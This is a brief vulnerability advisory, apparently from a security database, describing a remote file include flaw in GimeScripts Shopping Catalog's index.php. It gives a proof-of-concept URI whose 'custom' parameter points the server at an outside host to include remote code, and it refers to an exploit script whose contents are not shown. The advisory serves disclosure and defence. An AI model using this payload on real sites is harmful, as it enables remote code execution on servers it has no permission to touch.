GimeScripts Shopping Catalog Index.PHP Remote File Include Vulnerability

GimeScripts Shopping Catalog Index.PHP Remote File Include Vulnerability

An attacker can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://www.example.com/index.php?function=custom&custom=http://www.example2.com

Sample exploit code has also been provided:

/data/vulnerabilities/exploits/20979.pl